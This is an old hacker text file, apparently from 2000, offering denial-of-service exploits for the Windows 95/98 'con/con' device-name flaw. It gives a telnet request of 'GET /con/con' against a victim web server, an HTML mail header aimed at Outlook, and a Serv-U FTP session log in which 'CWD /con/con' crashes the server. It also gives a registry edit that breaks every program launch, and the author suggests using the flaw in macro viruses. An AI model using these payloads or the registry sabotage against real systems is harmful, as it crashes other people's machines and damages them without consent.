=-= Next Generation of Windows 98 Blues Screen (2) =-= By RUBINHO(C) from BraZiL Original exploit found by www.securax.org Only for: ruindows 98 maybe 95 too. Techniques: ################################################################### *NEW* - Infernal Pulse (03/17/2000) =-= WIN98 webservers =-= customized by RUBINHO(C) rubinhoc:root#telnet victim.com 80 Trying x.x.x.x... Connected to victim.com Escape character is '^]'. GET /con/con HTTP/1.0... /*<< Write this line =) #################################################################### *NEW* - RUBINHO(C) (03/16/2000) Test: Outlook mail client =-= MAIL with HTMLs TAG (he...he): =-= (evil) To: victim@xxx.com From: hell Subject: Good Morning Content-type: text/html; ################################################################# *OLD* - G#Df@RTER & Pathos (03/14/2000) =-= WebPAGE =-= Test: NETSCAPE and IE (crash): =-= servU-FTP =-= 230 user logged in, proceed SYST 215 UNIX TYPE:L8 connect ok! PWD 257 "c:/home" is current directory. haal directory op TYPE A 200 Type set to A. PORT xx.xx.xx.xx :-) 200 PORT Command succesful LIST 150 Opening ASCII mode data connect Download: 86 bytes Wacht op de server 226 transfer complete CDUP 250 directory changed to /c:/ PWD 250 "/c:/" is current directory CWD /con/con --> this does the trick ... no more response :-) server crashed. =-= WIN REGISTRY =-= This is probably just the beginning of a new series of exploits for windoze. this little flaw could easily be used in a macro virus or local. maybe even be placed in the registry HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open c:\con\con "%1" %* ########################################################################